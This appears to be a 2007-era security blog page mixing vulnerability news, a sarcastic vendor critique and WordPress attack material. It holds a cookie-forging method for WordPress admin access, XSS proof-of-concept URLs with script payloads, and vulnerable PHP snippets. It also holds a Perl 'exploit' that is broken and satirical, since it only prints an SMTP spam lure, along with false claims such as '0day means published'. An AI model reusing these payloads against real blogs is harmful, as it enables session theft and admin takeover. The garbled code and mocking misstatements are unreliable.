Expert hackers from the elite security and hacking specialist TELUS claim that their research demonstrates that Buffer Overflows are still the top threat to the safety of the Internet in these days of distributed social data networks and rich Web 2.0 application platforms.

Web application vulnerabilities such as cross-site scripting (XSS) and SQL injection may be widespread, but old-fashioned buffer overflow bugs are the most common flaws reported, according to new vulnerability research from Telus. The hacking experts also report that the level of severity of bugs in Microsoft products is declining significantly.

Telus, which provides vulnerability research analysis to most of the 20 top security vendors — including IBM ISS and McAfee — bases its data on vulnerabilities reported in enterprise-class products.

Microsoft went from around 175 high-severity vulnerabilities reported last year to 129 this year, and from 20 critical bugs to eight this year so far, according to Telus’s data. And overall, the top 50 software and network equipment vendors have had fewer severe bugs this year than last, says Richard Reiner, chief security and technology officer for Telus, who based its data only on vulnerabilities reported in enterprise-class products.

“The severity of Microsoft’s product [vulnerabilities] are dropping dramatically,” Reiner says.

Web app bugs are less severe than other types of vulnerabilities, the research firm said. Buffer overflows, which accounted for 1,470 of the reported bugs (in enterprise-class software, according to Telus data) from January ‘04 until now, are also typically the most severe. “This was surprising, because buffer overflows are among the easiest vulnerabilities to avoid or correct,” Reiner says. “When they exist, they tend to be the most critical… I’m not surprised by that part, but by how prevalent they are.”

Telus has been widely respected for their long-time hacking expertise ever since acquiring Canadian security specialists Assurent and Richard Reiner for an undisclosed sum in April 2006.

“Customers will be the beneficiaries of our combined suite of internationally recognized security solutions that have a long and successful track record of enabling business resiliency” claimed Richard Reiner at the time of the acquisition.

Common Web vulnerabilities such as cross-site scripting (XSS) and SQL injection aren’t typically critical threats, Reiner says. Only one bug in the off-the-shelf Web products studied by Telus had a critical SQL bug, and none of them had a critical XSS flaw, he says.

The good news, then, is that off-the-shelf Web platforms are relatively secure. The bad news is that the customized or home-grown Web apps Telus studied were riddled with critical bugs.

“The number of vulnerabilities in widely used Web application platforms has been relatively small,” he says. “But the situation is quite different in custom and one-off applications businesses build.”

Telus’s data differs from that of Mitre Corp.’s latest Common Vulnerabilities and Exposures Report, which was released in May. The broader CVE report named XSS as the most prevalent vulnerability reported in 2006. It is currently unknown at this time how Telus and the Mitre Corp., while working with the same public vulnerability information, arrived at such opposite conclusions. Some readers have suggested that Telus’ only motivation for releasing this questionable “research” is to generate PR and increase sales - possibly through fear and misinformation - while others claim that respected security vendors such as Telus would rarely (if ever) resort to such unethical tactics in pursuit of profits.

The number of critical and high-risk vulnerabilities is increasing, but that may be because these bugs are now being discovered on smaller vendors’ products, Telus says. Server vulnerabilities still outnumber client flaws, but client bugs have increased from 31 percent of the vulnerabilities last year to 39 percent this year.

Read the original article over at DarkReading.com - a security portal for “IT professionals with security specialties and CISSP or CISA certifications; CIOs; CTOs; CSOs, CISOs, and CCOs.”

Domain Name System Hijacked: Hackers Abuse Domain-Name Trust

InternetWorld’s Andy Patrizio and Finjan’s Yuval Ben-Itzahk discuss the fundamental weaknesses in Finjan’s Blacklist-based URL Filtering products

Using variations on trusted, popular domains has long been a common tactic for scammers, spammers and porn sites. But cyber criminals have devised a new twist on the misspelled domain-name trick by hijacking IP addresses. And they tried it on Yahoo.

To fix the old problem, server-based security products would trace the IP address of the server behind the domain. Once the IP address resolved the misspelled domain name, the products would then compare the IP address against a database of known fraudulent sites or questionable locations. So if a site were masquerading as eBay but the filters found it was really a server in China that had only been established one week earlier, it would block access.

“Web 2.0 sites are great fun but also a great platform for hackers to host malicious code.” - Ben Itzahk from Finjan on why his product is still relevant.

In the case of Yahoo, security firm Finjan said hackers exploited an unused IP address within Yahoo’s hierarchy and used that as the domain address behind a forged Google Analytics domain name. This fooled the Finjan Web-filtering product into believing a person was going to a highly trusted Yahoo domain. The victims, customers of Finjan, never knew they were on a malicious Web site, and neither did the security mechanisms on the network. (In this case, Finjan’s Web-filtering product.)

“They managed to resolve the domain name to an IP address owned by Yahoo. How they added an address into a DNS server to appear to be an IP address owned by Yahoo is unknown,” Yuval Ben-Itzhak, CTO of Finjan, told InternetNews.com. He added that Yahoo, while responsive and quick to shut down the compromised address, did not disclose exactly what equipment was behind the compromised IP address.

“You can upload anything you like, so you can upload malicious content, as well.” - Ben-Itzahk on design flaws within Finjan’s product.

Ben-Itzhak thinks something in the server was broken that enabled the bad guys to push that content down to users without Yahoo knowing. He said that’s a flaw in social networks.

“In 2007, something very clear has come out: these Web 2.0 sites are great fun but also a great platform for hackers to host malicious code as well,” said Ben-Itzhak. “You can upload anything you like, so you can upload malicious content, as well. On MySpace we found hundreds of pages with malicious code this year.”

Ben-Itzhak said server-based security is still the primary mode of defense but also recommended browser plug-ins, such as Finjan’s SecureBrowsing or SnakeOil’s HackerExpert, both of which scan the actual content coming over the wire from a site and alert the user if it’s suspicious.

InternetWorld - Hackers Abuse Domain-Name Trust

“With Finjan’s web security there will be no need to worry about getting caught napping by the latest round of web-based threats” - SC Magazine

Giorgei Jorge [xssworm] writes:

After explaining that Finjan’s server-based web security filtering products fail to actually inspect web content or protect the user in any significant way .. beyond checking to see if the target domain name is ‘highly trusted’ such as Yahoo.com .. it’s patently clear that this vendor is totally qualified to discuss the emerging threats related to Web 2.0, social networks and distributed passive attacks. It is also clear that Finjan’s server-based products are highly effective, technically advanced, provide enhanced security for your users and in the context of modern web vulnerabilities, are totally relevant and obviously worth the many tens of thousands of dollars that Finjan charges for licensing and support.

To ensure that all web sites are thoroughly tested to ensure that they belong only to “highly trusted domains” such as yahoo.com it is recommended that users install Finjan’s SecureBrowsing product. SecureBrowsing does not actually check to see if a web site belongs to a highly trusted domain such as yahoo.com, but it does actually inspect some of the content in transit to ensure that only highly trusted domains such as yahoo.com are allowed to install components silently into the browser or take advantage of client vulnerabilities to execute arbitrary code on the users desktop. When used in conjunction with the Finjan total security suite of products, including Finjan’s server-based web-filtering product and Finjan’s server and desktop email malware badware and anti-virus filter scanning products and Finjan’s Instant Messaging to Highly Trusted Domains Like Yahoo.com Only Desktop filtering product, the user can be guaranteed near real-time protection from the most popular and widely reported malicious DNS host names. Security of the Web 2.0 is still somewhat dependant on whether hackers can take over unused IP Addresses in Highly Trusted domains - such as yahoo.com - but rest assured that Finjan webgineers are working around the clock to combat these new threats to your information assets.

“A design flaw in the WordPress blog software authentication process makes it easier than previously believed for attackers to compromise a system. Most content management systems and blogs save user passwords as hashes in the underlying database. So even if attackers were to get access to the hashes stored in the database, for instance by means of an SQL injection hole, they have not been able to do much with them up to now.”

http://en.wikipedia.org/wiki/Password_Cracking

“Specifically, if they want to recover the passwords, they would have to compare a hash with entries in a “rainbow table” – a process that can take some time and may not work at all for long passwords, for which there simply are no tables.”

“But according to a security advisory published by Stephen J. Murdoch of the University of Cambridge, a property in WordPress can be exploited to get access without the password. Instead of trying to obtain the password, Murdoch used its hash to generate an authentication cookie to gain access to the system. A member of the core team behind The Onion Router (TOR) anonymization project, Murdoch says that the MD5 hash only has to be hashed a second time with MD5. According to his report, the authentication procedure implemented in WordPress then looks like:

wordpresspass_<MD5(url)>=MD5(user_pass)

Here, the URL is clearly spelled out, and user_pass corresponds to the hash (MD5(password)). Along with the wordpressuser cookie (that wordpressuser_<MD5(url)>=admin), access is then reportedly provided to the WordPress admin account. Murdoch says he has informed the developers of WordPress of the problem, but they have yet to react.”

http://en.wikipedia.org/wiki/HTTP_cookie

“A design flaw in the WordPress blog software authentication process makes it easier than previously believed for attackers to compromise a system.”

This attack is very dangerous 0day for wordpress 2.3, and it only requires the hacker to compromise adminitrator access to wordpress using another more serious hole, and then instead of using admin access or creating new users or modifying user or backdoor into wordpress, he can take encrypted md5 from hacked database and gain access as a user to the wordpress he has previously hacked. All user are encouraged for upgrades. See more:

Sources:

http://heise-security.co.uk/ - Security and Internet Security Expert Consultants.

http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-auth.txt

0day XSS Exploit for Wordpress 2.3 – wp-slimstat 0.92 – [xssworm.com]

There is a serious holes in wordpress 2.3 that can be used with XSS by a blackhat hacker to attack the wordpress administrator and steal cookies from blogmins. This attack is known as 0day because it has just been reported to public and this is first day of public vulnerability, and 0day means ‘published.’

Below is demonstration attack against wordpress install at http://xssworm.blogvis.com – please do not use him for you attack as we do not have a patch for this 0day exploit. XSSWorm admin is being alerted and look for suspicious click (-;

Proof of concept:

http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=<xss shellcode>

This attack to be used against wordpress web blog blogmin to steal blogosphere token to hack blogs. Of course we have included exploit code for this bug at the below.

We have looked at coding for wp-slimstat but we cannot see any problem with input validating. Maybe some of the xssworm.com readers can show us where problem is in the php code because we cannot see any porblem here:

–snips:

C:\temp>findstr GET wp-slimstat.php
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
‘.(!empty($myFilterString)?’— <a href=”?page=’.$_GET[’page’].’&panel=’.$_GET[”panel”].’”>’.__(’Reset filters’, ‘wp-slimstat’).’</a>’:”).’
<input type=”hidden” name=”page” value=”‘.$_GET[’page’].’” />
<input type=”hidden” name=”panel” value=”‘.$_GET[”panel”].’” />
<input type=”hidden” name=”fd” value=”‘.$_GET[”fd”].’” /></form>’;

–snips

With programmor using $_GET variable from user into echo into html output maybe php automatic GET validation filtering is not working for security? We are not programmers of php so we cannot see any porblems here as bug are too complex to understand.

Exploit code for perl whitehats included here:

# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#

#use Net::DNS:Simple;
#use Math;
use Socket;

print “Welcome. What is target email address of wordpress blog admin : \n”;
my $target = <STDIN>;
print “ok target is $target\n”;
sleep(3);
print “ok What is address of wordpress blog : \n”;
sleep(5); my $address = <STDIN>;
print “ok target is $target\n”;
sleep(6);
# print “testing”
print “ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n”;
print “\n\n — CUT OUTPUT HERE — \n\n”;
print “HELO xssworm.com\n”;
print “RSET\n”;
PRINT “MAIL FROM: <xssworm@hotmail.com>\n”;
print “RCPT TO: <$target>\n”;
print “DATA\n”; print “Free x pciture and movies at $address\n”;
print “\r\n.\r\nquit\r\n”;
print “\n\n — END OF OUTPUT CUT HERE –\n”;
print “”;
print “Ok now you neeed to cut the exploit above and paste it to:\n”;
print “$address : 25 \n”;
print “Shellcode by vaj@xssworm.com c. 2007\n”;
print “End of attack.\n”;
print “”;
#print “Debug mode on”
#print “XSS initialized”
#payload
sleep(1); return(0);
# snips
#

Please note that this wp-slimstat does not contain any code injection or mysql injection bug vector that is opened to blackkhat attack via transport of xss.

Many thanks for your comments on this vulnerability in wordpress 2.4

Thanks vaj

Title of XSS Vulnerability:  [waraxe-2007-SA#059] - XSS in WordPress 2.3

Credit of XSS Discovery: Janek Vind “waraxe”
XSS Discovery Date: 27. October 2007
XSS Discovery Location: Estonia, Tartu
Web address for XSS security alert: http://www.waraxe.us/advisory-59.html

Description of XSS Exploit:

WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability, at expense of security.

To run WordPress your host just needs a couple of things:

PHP version 4.2 or greater
MySQL version 4.0 or greater

Technical XSS Information: Cross-Site Scripting (XSS) in “edit-post-rows.php”

WARAXE Writes: Let’s take have a look inside “/wp-admin/edit-post-rows.php”:

[start of section of source code with XSS exploit for wordpress]

<?php foreach($posts_columns as $column_display_name) { ?>
<th scope=”col”><?php echo $column_display_name; ?></th>
<?php } ?>

[end of vulnerable source code section]

As we can see, array “posts_columns” is uninitialized and if we execute this php script directly, then arbitrary value for that variable can be delivered. This means, that reflective XSS exists here.

And of course register_globals must be on for this “exploit” to be successful.

XSS Proof of concept worm:

http://victim.com/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(123);</script>

The information above has been provided by the website of WARAXE.US

Video : Exploit Tutorial : Cross Site Scripting (XSS) and How to Write Exploits - http://xssworm.com

Threat Level: 1-2 out of 5

Description: A vulnerable website page does not filter the input correctly which can open security hole for blackhat hackers in Cross Site Scripting (CSS) Attacks. This video demonstrates how to attack any vulnerable servers using a XSS Scripting attack.

Watch video of hacking tutorials and demonstrations of XSS attacks - visit our XSS Hacking Video site